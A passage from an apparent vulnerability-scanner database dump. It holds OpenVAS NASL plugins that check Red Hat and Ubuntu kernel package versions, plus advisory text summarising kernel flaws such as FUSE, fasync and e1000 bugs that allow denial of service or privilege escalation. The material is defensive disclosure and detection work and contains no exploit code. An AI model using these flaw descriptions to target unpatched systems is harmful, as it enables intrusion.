possibly, privilege escalation. (CVE-2009-3080, Important)\n \n * a flaw was found in the FUSE implementation. When a system is low on\n memory, fuse_put_request() could dereference an invalid pointer, possibly\n leading to a local denial of service or privilege escalation.\n (CVE-2009-4021, Important)\n \n * Tavis Ormandy discovered a deficiency in the fasync_helper()\n implementation. This could allow a local, unprivileged user to leverage a\n use-after-free of locked, asynchronous file descriptors to cause a denial\n of service or privilege escalation. (CVE-2009-4141, Important)\n \n * the Parallels Virtuozzo Containers team reported the RHSA-2009:1243\n update introduced two flaws in the routing implementation. If an attacker\n was able to cause a large enough number of collisions in the routing hash\n table (via specially-crafted packets) for the emergency route flush to\n trigger, a deadlock could occur. Secondly, if the kernel routing cache was\n disabled, an uninitialized pointer would be left behind after a route\n lookup, leading to a kernel panic. (CVE-2009-4272, Important)\n \n * the RHSA-2009:0225 update introduced a rewrite attack flaw in the\n do_coredump() function. A local attacker able to guess the file name a\n process is going to dump its core to, prior to the process crashing, could\n use this flaw to append data to the dumped core file. This issue only\n affects systems that have "/proc/sys/fs/suid_dumpable" set to 2 (the\n default value is 0). (CVE-2006-6304, Moderate)\n \n The fix for CVE-2006-6304 changes the expected behavior: With suid_dumpable\n set to 2, the core file will not be recorded if the file already exists.\n For example, core files will not be overwritten on subsequent crashes of\n processes whose core files map to the same name.\n \n * an information leak was found in the Linux kernel. On AMD64 systems,\n 32-bit processes could access and read certain 64-bit registers by\n temporarily switching themselves to 64-bit mode. (CVE-2009-2910, Moderate)\n \n * the RHBA-2008:0314 update introduced N_Port ID Virtualization (NPIV)\n support in the qla2xxx driver, resulting in two new sysfs pseudo files,\n "/sys/class/scsi_host/[a qla2xxx host]/vport_create" and "vport_delete".\n These two files were world-writable by default, allowing a local ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"kernel on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2010-January/msg00013.html\");\n script_id(870210);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-20 09:25:19 +0100 (Wed, 20 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2010:0046-01\");\n script_cve_id(\"CVE-2006-6304\", \"CVE-2009-2910\", \"CVE-2009-3080\", \"CVE-2009-3556\", \"CVE-2009-3889\", \"CVE-2009-3939\", \"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4272\");\n script_name(\"RedHat Update for kernel RHSA-2010:0046-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.11.1.el5\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:05:13", "references": ["894-1", "http://www.ubuntu.com/usn/usn-894-1/"], "pluginID": "1361412562310840383", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-894-1", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-02-08T00:00:00", "type": "openvas", "title": "Ubuntu Update for Linux kernel vulnerabilities USN-894-1", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0007", "CVE-2009-4141", "CVE-2010-0291", "CVE-2009-4538", "CVE-2009-4020", "CVE-2009-4536", "CVE-2009-4308", "CVE-2009-4021", "CVE-2010-0003", "CVE-2009-4031", "CVE-2010-0006", "CVE-2009-4138"], "modified": "2018-01-18T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840383", "id": "OPENVAS:1361412562310840383", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_894_1.nasl 8457 2018-01-18 07:58:32Z teissa $\n#\n# Ubuntu Update for Linux kernel vulnerabilities USN-894-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4\n filesystems did not correctly check certain disk structures. If a user\n were tricked into mounting a specially crafted filesystem, a remote\n attacker could crash the system or gain root privileges. (CVE-2009-4020,\n CVE-2009-4308)\n\n It was discovered that FUSE did not correctly check certain requests.\n A local attacker with access to FUSE mounts could exploit this to\n crash the system or possibly gain root privileges. Ubuntu 9.10 was not\n affected. (CVE-2009-4021)\n \n It was discovered that KVM did not correctly decode certain guest\n instructions. A local attacker in a guest could exploit this to\n trigger high scheduling latency in the host, leading to a denial of\n service. Ubuntu 6.06 was not affected. (CVE-2009-4031)\n \n It was discovered that the OHCI fireware driver did not correctly\n handle certain ioctls. A local attacker could exploit this to crash\n the system, or possibly gain root privileges. Ubuntu 6.06 was not\n affected. (CVE-2009-4138)\n \n Tavis Ormandy discovered that the kernel did not correctly handle\n O_ASYNC on locked files. A local attacker could exploit this to gain\n root privileges. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)\n \n Neil Horman and Eugene Teo discovered that the e1000 and e1000e\n network drivers did not correctly check the size of Ethernet frames.\n An attacker on the local network could send specially crafted traffic\n to bypass packet filters, crash the system, or possibly gain root\n privileges. (CVE-2009-4536, CVE-2009-4538)\n \n It was discovered that "print-fatal-signals" reporting could show\n arbitrary kernel memory contents. A local attacker could exploit\n this, leading to a loss of privacy. By default this is disabled in\n Ubuntu and did not affect Ubuntu 6.06. (CVE-2010-0003)\n \n Olli Jarva and Tuomo Untinen discovered that IPv6 did not correctly\n handle jumbo frames. A remote attacker could exploit this to crash the\n system, leading to a denial of service. Only Ubuntu 9.04 and 9.10 were\n affected. (CVE-2010-0006)\n \n Florian Westphal discovered that bridging netfilter rules could be\n modified by unprivileged users. A local attacker could disrupt network\n traffic, leading to a denial of service. (CVE-2010-0007)\n \n Al Viro discovered that certain mremap operations could leak kernel\n memory. A local attacker could exploit this to consume all available\n memory, leading to a denial of service. (CVE-2010-0291)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-894-1\";\ntag_affected = \"Linux kernel vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-894-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840383\");\n script_version(\"$Revision: 8457 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-18 08:58:32 +0100 (Thu, 18 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-02-08 11:34:22 +0100 (Mon, 08 Feb 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"894-1\");\n script_cve_id(\"CVE-2009-4020\", \"CVE-2009-4021\", \"CVE-2009-4031\", \"CVE-2009-4138\", \"CVE-2009-4141\", \"CVE-2009-4308\", \"CVE-2009-4536\", \"CVE-2009-4538\", \"CVE-2010-0003\", \"CVE-2010-0006\", \"CVE-2010-0007\", \"CVE-2010-0291\");\n script_name(\"Ubuntu Update for Linux kernel vulnerabilities USN-894-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18-generic\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18-server\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-generic\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-server\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.28-18-virtual\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.28\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.28-18\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.28\", ver:\"2.6.28-18.59\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-386\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-686\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-k7\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-386\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-686\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-k7\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.15\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.15\", ver:\"2.6.15-55.82\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.27-17-generic\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.27-17-server\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-generic\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-server\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.27-17-virtual\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.27\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.27-17\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.27\", ver:\"2.6.27-17.45\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-openvz\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-rt\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27-xen\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-386\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-generic\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-server\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-debug-2.6.24-27-virtual\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-openvz\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-rt\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-27-xen\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.24\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-27\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.24\", ver:\"2.6.24-27.65\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-304-ec2\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-304-ec2\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-386\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-generic-pae\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19-generic\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-386\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-generic-pae\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-generic\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-19-virtual\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.31\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-304\", ver:\"2.6.31-304.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-19\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.31\", ver:\"2.6.31-19.56\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-28T18:23:34", "references": ["http://linux.oracle.com/errata/ELSA-2010-0046.html"], "pluginID": "1361412562310122396", "description": "Oracle Linux Local Security Checks ELSA-2010-0046", "edition": 6, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2010-0046", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3556", "CVE-2009-3939", "CVE-2009-4272", "CVE-2009-2910", "CVE-2009-4141", "CVE-2009-3080", "CVE-2006-6304", "CVE-2009-4020", "CVE-2009-3889", "CVE-2009-4021", "CVE-2009-4138"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122396", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0046.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 